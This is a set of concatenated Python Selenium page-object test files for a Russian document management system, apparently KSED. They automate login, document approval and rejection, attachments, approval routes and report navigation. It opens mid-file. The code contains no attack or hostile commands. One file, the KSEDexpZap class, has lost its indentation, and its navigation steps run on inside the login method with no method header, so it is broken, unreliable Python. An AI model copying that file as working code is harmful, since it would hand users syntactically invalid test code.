    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDnaprSZSoglas(Locator, dataTest, KSEDLocators):
    """Page object: send an internal memo ("СЗ") through the approval route."""

    def __init__(self, web_driver, uri=''):
        """Open the application start page and wait for it to render."""
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        page = Locator(self.w)
        page.username_text = username
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    # Open the document created by the previous test case.
    def getDoc(self):
        """Navigate to the document URL stored in Tests/linkDocSZ.txt."""
        # BUG FIX: the original called my_string.strip() and discarded the
        # result (str.strip returns a new string), so the URL kept any
        # trailing newline; also use a context manager for the file.
        with open("Tests/linkDocSZ.txt", "r") as my_file:
            my_string = my_file.read().strip()
        self.w.get(my_string)
        wait_page_loaded(self.w)

    # Add an attachment.
    def attachment(self,):
        """Attach C:\\test.txt to the document via the attachments panel."""
        page = Locator(self.w)
        actions = ActionChains(self.w)
        actions.move_to_element(page.vlozheniya).perform()
        time.sleep(0.5)
        page.attachments.click()
        time.sleep(0.5)
        page.show_list.click()
        time.sleep(0.5)
        page.fileUpload.click()
        time.sleep(0.5)
        page.files.send_keys('C:\\test.txt')

    # Build the approval route.
    def creation_of_the_approval_route(self):
        """Create an individual approval route with one approval stage."""
        page = Locator(self.w)
        time.sleep(1)
        # Click "Show full card".
        page.show.click()
        # "Approval" tab.
        WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.soglasovanieWkladka)))
        page.soglasovanieWkladka.click()
        # Click the "Create route" button.
        WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.createRuleBtn)))
        page.createRuleBtn.click()
        # Choose "Individual route".
        page.createRuleIndivid.click()
        # The "Route editing" form appeared — press "OK".
        WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.btnOKform)))
        page.btnOKform.click()
        # Press "Add stage".
        WebDriverWait(self.w, 10).until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.addEtap)))
        page.addEtap.click()
        time.sleep(1.5)
        # Fill "Stage kind".
        page.tipeEtap.send_keys("Согласование"+ Keys.ENTER)
        time.sleep(0.5)
        page.tipeEtap.send_keys(Keys.ENTER)
        time.sleep(1)
        # Fill "Approvers".
        page.soglasuychie.send_keys("Яцкин" + Keys.ENTER)
        # Press "OK" on the form.
        time.sleep(0.5)
        page.btnOKformSogl.click()
        wait_page_loaded(self.w)

    # Send for approval and check the document status.
    def NapSoglasovanie(self, ):
        """Send the document for approval and assert its status changed."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        time.sleep(1)
        page.sendFor_approval.click()
        wait_page_loaded(self.w)
        # Check the document status.
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
        page.osnSvedeniya.click()
        assert "На согласовании" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver import ActionChains
from page_objects import PageObject
from page_objects import PageElement
from page_objects import MultiPageElement
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDAbsence(Locator, dataTest, KSEDLocators):
    """Page object: set and then cancel an absence auto-reply in the profile."""

    def __init__(self, web_driver, uri=''):
        # Open the application start page and wait for it to render.
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        page = Locator(self.w)
        page.username_text = username
        # NOTE(review): debug print of the class-level locator attribute.
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    # Go to the "Логика ECM.Мой профиль" (my profile) page.
    def getLogicESM(self, ):
        """Open the user menu and navigate to the Logic ECM profile page."""
        page = Locator(self.w)
        page.user_menu.click()
        page.logic_ESM.click()
        wait_page_loaded(self.w)
        assert "Логика ECM.Мой профиль" in self.w.title

    def Absence(self):
        """Create an absence auto-reply, verify it appeared, then cancel it."""
        wait = WebDriverWait(self.w, 10, poll_frequency=1,
                             ignored_exceptions=[NoSuchElementException,
                                                 ElementNotVisibleException,
                                                 ElementNotSelectableException])
        page = Locator(self.w)
        page.autoAnswerText.clear()
        page.autoAnswerText.send_keys('Навстречу злоключениям...')
        page.btnCreateDoc.click()
        wait_page_loaded(self.w)
        assert "Логика ECM.Мой профиль" in self.w.title
        # The cancel button becoming visible proves the absence was created.
        assert wait.until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.btnCancelAbsence)))
        # Cancel the absence.
        page.btnCancelAbsence.click()
        page.btnYes.click()
        wait_page_loaded(self.w)
        # The create button is visible again once the absence is cancelled.
        assert wait.until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.btnCreateDoc)))
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDexpZap(MPages, Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri = dataTest.baseURL):
super().__init__(web_driver, uri)
# self.get(dataTest.baseURL)
# wait_page_loaded(self.w)
@allure.step("Авторизация")
def LogIN(self, username, password):
self.username_text = username
self.password_text = password
self.LogIn_button.click()
self.wait_page_loaded()
#wait_page_loaded(self._web_driver)
assert "АРМ" in self._web_driver.title
self.wait_page_loaded()
self.mySearch.move_to_element() # Перейти в строку отчеты
self.mySearch.wait_to_be_clickable()
self.mySearch.click()
self.btnPlus.wait_to_be_clickable() # развернуть на "+"
self.btnPlus.click()
self.zaprosToDel.wait_to_be_clickable() # выбрать созданный по предусловию запрос
self.zaprosToDel.click() # выбрать созданный по предусловию запрос
self.checkBoxFirst.wait_to_be_clickable() # выбрать созданный по предусловию запрос
self.checkBoxFirst.click() #Первый чекбокс в списке
self.butAct.wait_to_be_clickable() #Кнопка действия с выбором
self.butAct.click() # Первый чекбокс в списке
self.butFavorite.wait_to_be_clickable()
self.butFavorite.click() #Кнопка добавить в избранное
self.butOK.wait_to_be_clickable()
self.butOK.click() # Кнопка действия с выбором
assert self.oblProsm.is_displayed() # Проверка, что отображается рабочая область
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocPorSoglas(MPages, dataTest, KSEDLocators):
    """Page object: approve an instruction ("поручение") document."""

    def __init__(self, web_driver, uri=dataTest.baseURL):
        """Initialise the page object on the application base URL."""
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation or a document page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title

    # Open the document created by the previous test case.
    def getDoc(self):
        """Navigate to the document URL stored in Tests/linkDocPoruchenie.txt."""
        # BUG FIX: the original called my_string.strip() and discarded the
        # result (str.strip returns a new string), so the URL kept any
        # trailing newline; also use a context manager for the file.
        with open("Tests/linkDocPoruchenie.txt", "r") as my_file:
            my_string = my_file.read().strip()
        self._web_driver.get(my_string)
        self.wait_page_loaded()

    def Soglasovanie(self, ):
        """Approve the document and assert the approval result is shown."""
        self.APPROVED_button.wait_to_be_clickable()
        self.APPROVED_button.click()
        self.apply_button_button2.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        # Open the approval tab.
        self.soglasovanieWkladka2.wait_to_be_clickable()
        self.soglasovanieWkladka2.click()
        # Expand the approvals drop-down list.
        self.dropBtn.wait_to_be_clickable()
        self.dropBtn.click()
        self.status_Doc.wait_until_not_visible()
        assert "Согласовано" in self.resultSogl.get_text()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocPorDorab(MPages, dataTest, KSEDLocators):
    """Page object: reject an instruction document and return it for rework."""

    def __init__(self, web_driver, uri=dataTest.baseURL):
        """Initialise the page object on the application base URL."""
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation or a document page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title

    # Open the document created by the previous test case.
    def getDoc(self):
        """Navigate to the document URL stored in Tests/linkDocPoruchenie.txt."""
        # BUG FIX: the original called my_string.strip() and discarded the
        # result (str.strip returns a new string), so the URL kept any
        # trailing newline; also use a context manager for the file.
        with open("Tests/linkDocPoruchenie.txt", "r") as my_file:
            my_string = my_file.read().strip()
        self._web_driver.get(my_string)
        self.wait_page_loaded()

    # Reject the approval and return the document for rework.
    def REJECTED(self,):
        """Reject the document with a comment and assert the rejection shows."""
        self.REJECTED_button.wait_to_be_clickable()
        self.REJECTED_button.click()
        self.prop_bpm_comment.wait_until_not_visible()
        self.prop_bpm_comment.send_keys('Отклонено')
        self.apply_button_button.wait_to_be_clickable()
        self.apply_button_button.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        # Open the approval tab.
        self.soglasovanieWkladka2.wait_to_be_clickable()
        self.soglasovanieWkladka2.click()
        # Expand the approvals drop-down list.
        self.dropBtn.wait_to_be_clickable()
        self.dropBtn.click()
        self.status_Doc.wait_until_not_visible()
        assert "Отклонено" in self.resultSogl.get_text()
        # Wait for the busy indicator to disappear before the test moves on.
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDPDPodpisanie_Otklon(Locator, dataTest, KSEDLocators):
    """Page object: reject the signing of a PD document and check its status."""

    def __init__(self, web_driver, uri=''):
        """Open the application start page and wait for it to render."""
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate (the title assertion was disabled in the original)."""
        page = Locator(self.w)
        page.username_text = username
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)

    # Open the document created by the previous test case.
    def getDoc(self):
        """Navigate to the document URL stored in Tests/linkPD.txt."""
        # BUG FIX: the original called my_string.strip() and discarded the
        # result (str.strip returns a new string), so the URL kept any
        # trailing newline; also use a context manager for the file.
        with open("Tests/linkPD.txt", "r") as my_file:
            my_string = my_file.read().strip()
        self.w.get(my_string)
        wait_page_loaded(self.w)

    def Podpisanie_Otklon(self, ):
        """Reject the document with a comment and assert it went to rework."""
        page = Locator(self.w)
        wait = WebDriverWait(self.w, 10)
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.REJECTED_button)))
        page.REJECTED_button.click()
        page.prop_bpm_comment.send_keys('я так хотю')
        page.apply_button_button.click()
        wait_page_loaded(self.w)
        # Check the document status.
        wait.until(EC.element_to_be_clickable((By.XPATH, KSEDLocators.osnSvedeniya)))
        page.osnSvedeniya.click()
        assert "На доработке" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDStatAllureVidDic(MPages, Locator, dataTest,KSEDLocators):
    """Page object: open the statistical report grouped by document type."""

    def __init__(self, web_driver, uri = dataTest.baseURL):
        # Navigation to the base URL is handled by the parent class.
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate, drill into the statistics report by document type
        and assert it opens in a second browser window."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title
        self.section_allur.move_to_element()  # go to the reports row
        self.section_allur.click()
        self.stat_tipDoc.wait_until_not_visible()
        self.node_Statis.click()  # go to the statistical reports node
        self.stat_tipDoc.wait_until_not_visible()
        self.stat_tipDoc.click()  # open the per-document-type summary
        self.confirm_4.wait_to_be_clickable()
        self.confirm_4.click()  # confirm the report parameters
        assert len(self._web_driver.window_handles) == 2  # second window opened
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDallurResolution(Locator, dataTest, KSEDLocators):
    """Page object: open the resolution execution-discipline report."""

    def __init__(self, web_driver, uri=''):
        # Open the application start page and wait for it to render.
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    def LogIN(self, username, password):
        """Authenticate, open the execution-discipline report and assert it
        opens in a second browser window."""
        page = Locator(self.w)
        page.username_text = username
        # NOTE(review): debug print of the class-level locator attribute.
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        page2 = MPages(self.w, self.w.current_url)
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title
        actions = ActionChains(self.w)
        actions.move_to_element(page.section_allur).click().perform()  # go to the reports row
        time.sleep(0.5)  # per the original author: the menu fails without this pause
        WebDriverWait(self.w, 5).until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.node_ispDisp)))
        page.node_ispDisp.click()  # go to execution-discipline reports
        page2.melements.click()
        page2.wait_page_loaded()
        page2.m2elements.click()
        WebDriverWait(self.w, 5).until(EC.visibility_of_element_located((By.XPATH, KSEDLocators.confirm_3)))
        page.confirm_3.click()  # "OK" button
        time.sleep(0.5)
        assert len(self.w.window_handles) == 2  # second window opened
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDPrintAttach(Locator, dataTest, KSEDLocators):
    """Page object: trigger printing of a document's attachment."""

    def __init__(self, web_driver, uri=''):
        """Open the application start page and wait for it to render."""
        super().__init__(web_driver, uri)
        self.get(dataTest.baseURL)
        wait_page_loaded(self.w)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Authenticate and assert the workstation ("АРМ") page opened."""
        page = Locator(self.w)
        page.username_text = username
        print(Locator.username_text)
        page.password_text = password
        page.LogIn_button.click()
        wait_page_loaded(self.w)
        assert "АРМ" in self.w.title

    # Open the document created by the previous test case.
    def getDoc(self):
        """Navigate to the document URL stored in Tests/linkDocSZ.txt."""
        # BUG FIX: the original called my_string.strip() and discarded the
        # result (str.strip returns a new string), so the URL kept any
        # trailing newline; also use a context manager for the file.
        with open("Tests/linkDocSZ.txt", "r") as my_file:
            my_string = my_file.read().strip()
        self.w.get(my_string)
        wait_page_loaded(self.w)

    def printAttach(self):
        """Click the print button and give the browser time to react.

        NOTE(review): all alert/window assertions in the original were
        commented out, so this only verifies that the click does not raise.
        """
        page = Locator(self.w)
        page.btnPrint.click()
        time.sleep(2)
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver import ActionChains
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=60, settle=2):
    """Poll the browser until document.readyState is 'complete'.

    :param driver: Selenium WebDriver (anything with execute_script).
    :param timeout: max seconds to poll; the original looped forever on a
        page that never finished loading, so raise TimeoutError instead.
    :param settle: initial pause in seconds so navigation can start before
        the first poll (the original hard-coded 2 s).
    :raises TimeoutError: if the page is not loaded within *timeout* seconds.
    """
    time.sleep(settle)
    deadline = time.monotonic() + timeout
    while not driver.execute_script("return document.readyState == 'complete';"):
        if time.monotonic() >= deadline:
            raise TimeoutError(
                "page did not reach readyState 'complete' within %s seconds" % timeout)
        time.sleep(0.1)
class KSEDCreatDocPorNIspoln(MPages, dataTest, KSEDLocators):
    """Page object: create an instruction ("поручение") document, attach a file,
    build an individual approval route, and send the document for execution.

    Locators and test data come from the MPages/dataTest/KSEDLocators mix-ins
    declared elsewhere in the project.
    """
    def __init__(self, web_driver, uri=dataTest.baseURL):
        super().__init__(web_driver, uri)
    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in with the given credentials; assert the workstation page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        #wait_page_loaded(self._web_driver)
        assert "АРМ" in self._web_driver.title
    # Document creation (open the creation form and fill in the attributes)
    def Creat(self,):
        """Open the "new instruction" form, fill the attributes and create the document."""
        self.newDoc_button.wait_to_be_clickable()
        self.newDoc_button.click()
        self.poruchenie.wait_to_be_clickable()
        self.poruchenie.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        # NOTE(review): uses self.w here but self._web_driver in LogIN —
        # presumably both come from MPages and refer to the same driver; confirm.
        assert "Страница создания документа" in self.w.title
        # Document attributes
        # Instruction type
        self.tipPoruch.scroll_to_element()
        self.tipPoruch.wait_until_not_visible()
        self.tipPoruch.send_keys(u'Для информации' + Keys.ENTER)
        # Document category
        self.category_doc.wait_until_not_visible()
        self.category_doc.send_keys(u'Открытый' + Keys.RETURN)
        # Responsible executor
        self.otvetstv_ispoln.scroll_to_element()
        self.otvetstv_ispoln.wait_until_not_visible()
        self.otvetstv_ispoln.send_keys(u'Строганов' + Keys.RETURN)
        # "Create" button
        self.btnCreateDoc.scroll_to_element()
        self.btnCreateDoc.wait_to_be_clickable()
        self.btnCreateDoc.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        assert "Документ" in self.w.title
    # Attachment upload
    def attachment(self, ):
        """Hover over the attachments area and upload C:\\test.txt."""
        actions = ActionChains(self._web_driver)
        actions.move_to_element(self.vlozheniya).perform()
        self.attachments.wait_to_be_clickable()
        self.attachments.click()
        self.fileUpload2.wait_to_be_clickable()
        self.fileUpload2.click()
        self.files.wait_to_be_clickable()
        self.files.send_keys('C:\\test.txt')
    # Approval route creation
    def creation_of_the_approval_route(self):
        """Create an individual approval route with a single approval stage."""
        # Click "Show common card"
        self.show.wait_until_not_visible()
        self.show.wait_to_be_clickable()
        self.show.click()
        # "Approval" tab
        self.soglasovanieWkladka.wait_to_be_clickable()
        self.soglasovanieWkladka.click()
        # Click the "Create route" button
        self.createRuleBtn.wait_to_be_clickable()
        self.createRuleBtn.click()
        # Choose "Individual route"
        self.createRuleIndivid.wait_to_be_clickable()
        self.createRuleIndivid.click()
        # The "Route editing" form appeared; press "OK"
        self.btnOKform.wait_to_be_clickable()
        self.btnOKform.click()
        # Press the "Add stage" button
        self.addEtap.wait_to_be_clickable()
        self.addEtap.click()
        # Fill in the "Stage kind" field
        self.tipeEtap.wait_until_not_visible()
        self.tipeEtap.send_keys("Согласование" + Keys.RETURN)
        # Fill in the "Approvers" field
        self.soglasuychie.wait_until_not_visible()
        self.soglasuychie.send_keys("Яцкин" + Keys.RETURN)
        # Press "OK" on the form
        self.btnOKformSogl.wait_to_be_clickable()
        self.btnOKformSogl.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
    # Send for execution
    def NapIspolnenie(self, ):
        """Send the document for execution and verify its status is "На исполнении"."""
        self.sendFor_execution.wait_to_be_clickable()
        self.sendFor_execution.click()
        self.btnOKnaprNaIspoln.wait_to_be_clickable()
        self.btnOKnaprNaIspoln.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        # Check the document status
        self.osnSvedeniya.wait_to_be_clickable()
        self.osnSvedeniya.click()
        self.status_Doc.wait_until_not_visible()
        assert "На исполнении" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time
from selenium.webdriver.common.keys import Keys
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
from KSED.TestData.pages import MPages
import allure
def wait_page_loaded(driver, timeout=None, initial_delay=2):
    """Block until ``document.readyState == 'complete'``.

    Backward compatible with the original single-argument form.

    :param driver: WebDriver-like object exposing ``execute_script``.
    :param timeout: optional max seconds to poll after the initial delay;
        ``None`` (default) preserves the original wait-forever behaviour.
    :param initial_delay: seconds to sleep before polling starts (default 2,
        matching the original implementation).
    :raises TimeoutError: if *timeout* elapses before the page is ready.
    """
    time.sleep(initial_delay)
    deadline = None if timeout is None else time.monotonic() + timeout
    page_loaded = False
    while not page_loaded:
        if deadline is not None and time.monotonic() > deadline:
            raise TimeoutError("page did not reach readyState 'complete' in time")
        page_loaded = driver.execute_script("return document.readyState == 'complete';")
        time.sleep(0.1)
class KSEDDocPorSendAllure(MPages, dataTest, KSEDLocators):
    """Page object: open an instruction document created by an earlier test case
    and send its execution report.

    Locators and test data come from the MPages/dataTest/KSEDLocators mix-ins
    declared elsewhere in the project.
    """

    def __init__(self, web_driver, uri=dataTest.baseURL):
        super().__init__(web_driver, uri)

    @allure.step("Авторизация")
    def LogIN(self, username, password):
        """Log in; assert either the workstation or a document page opened."""
        self.username_text = username
        self.password_text = password
        self.LogIn_button.click()
        self.wait_page_loaded()
        assert "АРМ" in self._web_driver.title or "Документ" in self._web_driver.title

    def getDoc(self):
        """Open the document whose URL was stored by a previous test case."""
        # Bug fix: the original called my_string.strip() and discarded the
        # result, navigating to a URL with a trailing newline; the context
        # manager also guarantees the file handle is closed.
        with open("Tests/linkDocPoruchenie.txt", "r") as link_file:
            url = link_file.read().strip()
        self._web_driver.get(url)
        self.wait_page_loaded()

    def sendAllure(self, ):
        """Send the execution report, link a related document, verify the status."""
        # Click the "Send report" action in the "Actions" menu
        self.actionSendAllere.wait_to_be_clickable()
        self.actionSendAllere.click()
        # Focus the "Report text" field
        self.textAllur.wait_to_be_clickable()
        self.textAllur.click()
        # Add a link to a related document
        self.btnAddSvyz.click()
        self.searchDoc.send_keys("У" + Keys.RETURN)
        self.oneListEl.wait_until_not_visible()
        self.oneListEl.click()
        self.btnOK.click()
        # Press the "Send" button
        self.btnSend.wait_to_be_clickable()
        self.btnSend.click()
        self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id="confirm-edit-fields-form-container_mask"]')
        self.wait_page_loaded()
        # Check the document status
        self.osnSvedeniya.wait_to_be_clickable()
        self.osnSvedeniya.click()
        self.status_Doc.wait_until_not_visible()
        assert "Исполнено" in self.status_Doc.text
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
